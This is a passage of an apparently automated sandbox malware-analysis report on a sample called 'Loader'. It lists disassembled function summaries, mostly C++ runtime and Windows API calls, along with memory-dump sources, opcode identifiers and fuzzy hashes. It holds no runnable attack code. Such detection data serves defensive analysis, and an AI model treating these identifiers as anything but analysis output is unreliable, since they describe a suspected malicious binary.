                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2673424686-393685449
                                                                                                  • Opcode ID: 9d3c5447690153b60cc5ad1aaea9953c8bb564f3db07afe88e9f6e841f26fcf9
                                                                                                  • Instruction ID: da6554835e79643d8ef67698ec85b8e3bd82f00eb2f393e9b9202f50b7e08e26
                                                                                                  • Opcode Fuzzy Hash: 9d3c5447690153b60cc5ad1aaea9953c8bb564f3db07afe88e9f6e841f26fcf9
                                                                                                  • Instruction Fuzzy Hash: 69B17BB1810209EFCF15DFA4CD81AAEB7B9BF54310F10C55AF9196B212D731DA61CBA2
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6BF44
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6C028
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: e1ec7bf2ff6caee5a017c2ac6098447635a19f22caee9e73c04fa05c12d2f6eb
                                                                                                  • Instruction ID: 995849ce19085f9cebc3838a686c158f25b465363003b5a1e88ca751040c8dd6
                                                                                                  • Opcode Fuzzy Hash: e1ec7bf2ff6caee5a017c2ac6098447635a19f22caee9e73c04fa05c12d2f6eb
                                                                                                  • Instruction Fuzzy Hash: 3441BF74910205DFCF28DF68CA459AEB7B9BF58300B58805DE449E7662C734EA84CF61
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A877E463,?,?,00000000,00A8BE94,000000FF,?,00A75685,00000002,?,00A75721,00A78396), ref: 00A755F9
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A7560B
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A8BE94,000000FF,?,00A75685,00000002,?,00A75721,00A78396), ref: 00A7562D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
                                                                                                  • Instruction ID: eefcc7210dd4e8a402ff685ddd373c8c69b006b1ac175ec58baa60323affb04f
                                                                                                  • Opcode Fuzzy Hash: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
                                                                                                  • Instruction Fuzzy Hash: 94016231B50659AFDB11CF94DC09BAEBBF8FF04B15F044526F811A6690DFB49901CA94
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A7D76F
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A7D838
                                                                                                  • __freea.LIBCMT ref: 00A7D89F
                                                                                                    • Part of subcall function 00A7BF11: RtlAllocateHeap.NTDLL(00000000,00A7DF35,?,?,00A7DF35,00000220,?,00000000,?), ref: 00A7BF43
                                                                                                  • __freea.LIBCMT ref: 00A7D8B2
                                                                                                  • __freea.LIBCMT ref: 00A7D8BF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1423051803-0
                                                                                                  • Opcode ID: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
                                                                                                  • Instruction ID: 7d7f422dcffaa4a3d08942f4e48e47780df11c4294aed7f1dc90a1f89130509e
                                                                                                  • Opcode Fuzzy Hash: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
                                                                                                  • Instruction Fuzzy Hash: 8D51A172600206AFEB259F60DD81EBB7AB9EF84710B15C12DFD0CDB251EB71DC1096A1
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A6F005
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00A68E38), ref: 00A6F024
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F052
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0AD
                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 66001078-0
                                                                                                  • Opcode ID: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
                                                                                                  • Instruction ID: 3c4876ce82a86f408938425262c0dfb38033236a4ca8e44af2490a5ccdae6c9e
                                                                                                  • Opcode Fuzzy Hash: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
                                                                                                  • Instruction Fuzzy Hash: FA41CE7160060ADFCB20CF65E48196AB3F4FF05311B214A3AE456C7542EB30F985CF51
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A63CA5
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A63CBF
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A63CE0
                                                                                                  • __Getctype.LIBCPMT ref: 00A63D92
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A63DD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                  • String ID:
                                                                                                  • API String ID: 3087743877-0
                                                                                                  • Opcode ID: d58d2e527ec62a170cc823aa1dc984bd7f93264b0e447aca31f0528b27f56b48
                                                                                                  • Instruction ID: ad58b44c167ffecb72605f8dc2742d8f04d56c0070b85e0996fd8f3210a1c214
                                                                                                  • Opcode Fuzzy Hash: d58d2e527ec62a170cc823aa1dc984bd7f93264b0e447aca31f0528b27f56b48
                                                                                                  • Instruction Fuzzy Hash: 3D411472E006188FCB14DF94D945BAABBB1FF94B20F14861AD8156B391DB35AA02CF91
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00A6D4C9
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A6D4D3
                                                                                                  • int.LIBCPMT ref: 00A6D4EA
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210
                                                                                                  • codecvt.LIBCPMT ref: 00A6D50D
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A6D544
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                  • String ID:
                                                                                                  • API String ID: 3716348337-0
                                                                                                  • Opcode ID: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
                                                                                                  • Instruction ID: 549a932bb34eaa02d69d16fa49eac1dd923b0f3245091af4014775b450616e19
                                                                                                  • Opcode Fuzzy Hash: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
                                                                                                  • Instruction Fuzzy Hash: D801F931E001158FCF01EBA4CA15ABDBBB5AF84774F144509F416AB2C1CF349E01CB91
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00A6ADDE
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A6ADE9
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A6AE57
                                                                                                    • Part of subcall function 00A6ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A6ACC2
                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00A6AE04
                                                                                                  • _Yarn.LIBCPMT ref: 00A6AE1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1088826258-0
                                                                                                  • Opcode ID: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
                                                                                                  • Instruction ID: bba3bb878395a8f9f45b5f41a45fa0cbee2f85e58fd47b92d4b8f9956648e3f6
                                                                                                  • Opcode Fuzzy Hash: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
                                                                                                  • Instruction Fuzzy Hash: 8C018F75A006209FCB06FBA0DA5557D7BB5FFA4760B18401AE90667382CF396E42CF82
                                                                                                  APIs
                                                                                                  • std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6B809
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DecrefRef_count_base::_std::_
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 1456557076-2671469338
                                                                                                  • Opcode ID: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
                                                                                                  • Instruction ID: 977edcda10af2cb81a87c36a1541a1cb6a0b615a56c4058799bf19b2b53868b2
                                                                                                  • Opcode Fuzzy Hash: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
                                                                                                  • Instruction Fuzzy Hash: 2421F235921609DFCF389F94C956A6AB3BCEF54720F14851EE401CB690DB34AEC0CAA0
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C), ref: 00A8694D
                                                                                                  • GetLastError.KERNEL32(?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C,00000000,?,00A7BBBC), ref: 00A86957
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A8697F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
                                                                                                  • Instruction ID: ff6ab572dd5f14651975a567438a19e21c9f72231140478af9a3ffb5db01d59b
                                                                                                  • Opcode Fuzzy Hash: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
                                                                                                  • Instruction Fuzzy Hash: 19E01A30380204BAEF202BA4EC06B6C3A55AF40B91F184421FA4CA84E0DB72ED659A44
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(A877E463,00000000,00000000,?), ref: 00A84001
                                                                                                    • Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A84253
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A84299
                                                                                                  • GetLastError.KERNEL32 ref: 00A8433C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
                                                                                                  • Instruction ID: af67fe55dc6fe746bb720b8030332e92d1f80bd435cd9acea8b2d48c7f62dbe0
                                                                                                  • Opcode Fuzzy Hash: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
                                                                                                  • Instruction Fuzzy Hash: 1CD18A75E042599FCF15DFE8C880AEDBBB5FF18314F28812AE556EB351DA30A942CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: f12b65c5f1f7940aff09d3acfbd2d6dfc644f00e786dc87d0d700d04016293ee
                                                                                                  • Instruction ID: a9501bef1a6f980798829842158267077c8b86dc42314fd93464d49e88976da1
                                                                                                  • Opcode Fuzzy Hash: f12b65c5f1f7940aff09d3acfbd2d6dfc644f00e786dc87d0d700d04016293ee
                                                                                                  • Instruction Fuzzy Hash: 4C51D6B2614601DFDB259F54CD91BAA77B4EF00710F14C52DF80A5B691E731EC90DBA0
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A672C5
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A67395
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A673A3
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A673B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2261580123-0
                                                                                                  • Opcode ID: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
                                                                                                  • Instruction ID: 51274188e0dfa814c27309d5479e5cc069075e2aa0671c2f8de60154cff883df
                                                                                                  • Opcode Fuzzy Hash: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
                                                                                                  • Instruction Fuzzy Hash: C341F2B1A10705CBDB21EB64C941B6FB7B4FF44324F144639E81A9B791EB34E854CBA1
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A64495
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A644B2
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A644D3
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A64580
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID:
                                                                                                  • API String ID: 593203224-0
                                                                                                  • Opcode ID: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
                                                                                                  • Instruction ID: 351164fa42ca7d1bffc9114f7faf328be23733283236ffb462b42f7c2f6d7cdb
                                                                                                  • Opcode Fuzzy Hash: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
                                                                                                  • Instruction Fuzzy Hash: 3F415A71E006188FCF10DF94D984BAEBBB1FB58720F54422AE81667391DB34AD45CFA1
                                                                                                  APIs
